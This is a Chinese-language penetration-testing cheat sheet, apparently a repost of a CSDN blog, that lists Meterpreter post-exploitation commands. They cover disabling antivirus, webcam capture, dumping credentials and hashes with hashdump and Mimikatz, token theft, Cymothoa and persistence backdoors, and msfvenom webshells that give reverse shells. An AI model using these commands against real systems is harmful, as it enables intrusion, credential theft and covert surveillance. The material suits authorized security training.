后渗透工具 – Meterpreter(WEB安全攻防)

0xx1 后渗透工具 – Meterpreter

  1. 优势

纯内存工作模式,不需要对磁盘进行任何写入操作

使用加密通信协议,并且可以同时与几个信道通信

在被攻击进程内工作,不需要创建新的进程

易于在多进程之间迁移

平台通用

0xx2 进程迁移

  1. ps – 获取目标机器进程
  2. getpid – 查看Meterpreter shell的进程号
  3. migrate – 进程迁移
  4. run post/windows/manage/migrate – 自动迁移进程

0xx3 系统命令

  1. sysinfo – 查看目标机的系统信息
  2. run post/windows/gather/checkvm – 检查目标是否运行在虚拟机上
  3. idletime – 查看目标最近的运行时间
  4. route – 查看目标完整的网络设置
  5. backgroune – 将当前会话放到后台
  6. getuid – 查看目标以渗透成功的用户名
  7. run post/windows/manage/killav -- 关闭杀毒软件
  8. run post/windows/manage/enable_rdp – 启动目标远程桌面协议(3389)
  9. run post/multi/manage/autoroute – 查看目标的本地子网情况
  10. route add – 添加路由
  11. route print – 查看添加的路由
  12. run post/windows/gather/enum_logged_on_users – 查看目标用户
  13. run post/windows/gather/enum_applications – 列举目标安装的应用程序
  14. run post/windows/gather/credentials/windows_autologin – 抓取自动登录的用户名密码
  15. load espia – 加载Espia插件
  16. screengrab – 在目标机截图(需要15)
  17. webcam_list – 查看目标机有没有摄像头
  18. webcam_snap – 打开目标摄像头,并拍照
  19. webcam_stream – 打开直播
  20. shell – 进入目标shell
  21. exit – 停止会话

0xx3 文件系统命令

  1. pwd & getwd – 查看当前的目标位置
  2. getlwd – 查看当前的本地位置
  3. ls – 列出目标目录文件
  4. cd – 切换目录
  5. search -f *.txt –d c:\\ -- 搜索C盘所有以txt为扩展名的文件
    1. -f 指定搜索文件模式
    2. -d 指定目录
  6. download c:\\test.txt  /root – 下载目标机C盘test.txt文件到本地/root下
  7. upload /root/test.txt c:\\ -- 上传本地/root/test.txt文件到目标C盘

0xx4 权限提升

  1. 提权方式
    1. 纵向提权:纵向提权低权限角色获得高权限角色的权限
    2. 横向提权:获取同级别角色的权限
  2. 漏洞提权
    1. whoami  /groups – 查看当前权限(CMD下)
    2. getsystem – 尝试直接获取权限(Meterpreter下)
    3. 相关漏洞网站
      1. https://www.securityfocus.com/bid
      2. https://www.exploit-db.com/
    4. 列出已安装补丁信息(CMD下)

wmic qfe get Caption,Description,HotFixID,InstalledOn

systeminfo

  1. 令牌窃取
    1. use incognito à list_tokens –u – 列出可用令牌
      1. Delegation Tokens – 授权令牌,支持交互式登陆(如远程桌面访问)
      2. Impersonation Tokens – 模拟令牌,不支持交互式登陆
    2. impersonate_token  主机名\\用户名 --窃取令牌
  2. Hash攻击
    1. hashdump – 提取目标sam数据库的Hash(在Meterpreter中)
    2. run post/windows/gather/smart_hashdump – 导出所有域用户的Hash
    3. Mimikatz(需要管理员权限)
      1. sysinfo -- 查看系统架构(若是64位系统,需要迁移到64位进程中)
      2. load mimikatz – 加载mimikatz
      3. msv – 抓取Hash
      4. kerberos – 抓取系统票据
      5. wdigest –获取系统账户信息
      6. mimikatz_command –f samdump::hashes – 抓取Hash
  3. 漏洞移植
    1. 将漏洞利用模块下载到本地,并移动到相应位置(/usr/share/metasploit-framework/modules  对应模块下)
    2. reload_all -- 重新加载全部文件
    3. 加载完成后,就可以使用search搜索到
  4. 后门
    1. 系统后门
      1. Cymothoa后门

是一款将shellcode注入现有进程的后门工具能,能够与被注入的进程(程序)共存,只要不检测内存,就无法发现,目标关闭或重启,后门就停止运行

-p 指定目标进程

-s 指定shellcode编号

-y 指定端口

连接: nc –nvv RHOST RPOST

      1. Persistence后门

是一款使用安装自启动方式的持久性后门,可以用来创建注册和文件,在meterpreter中,使用 run persistence –h 查看所有命令选项,需要在目标机器上创建文件,从而触发杀毒软件,需在运行前关闭杀毒软件

-A – 自动启动payload程序

-S – 系统启动时自动加载

-U – 用户登录时,自动启动

-X – 开机时自动加载

-i – 回连的时间间隔

-p – 监听反向连接端口号

-r – 目标机器IP地址

 

    1. Web后门
      1. Meterperter后门(PHP Meterpreter)
        1. 使用msfvenom创建一个webshell.php
        2. 上传webshell.php到目标服务器
        3. 运行Metasploit multi-handler 开始监听
        4. 访问webshell.php页面
        5. 获得反弹的Metasploit Shell
          1. 生成后门
            1. –p --设置payload
            2. –f – 设置输出文件格式
      2. Aspx Meterpreter后门(shell_reverse_tcp)

可以创建具有Meterpreter工能的各版本shellcode(如asp,aspx,msi,vbs等)使用大致与PHP Meterpreter相同

        1.  

猜你喜欢

转载自blog.csdn.net/a1453514850/article/details/88048839
今日推荐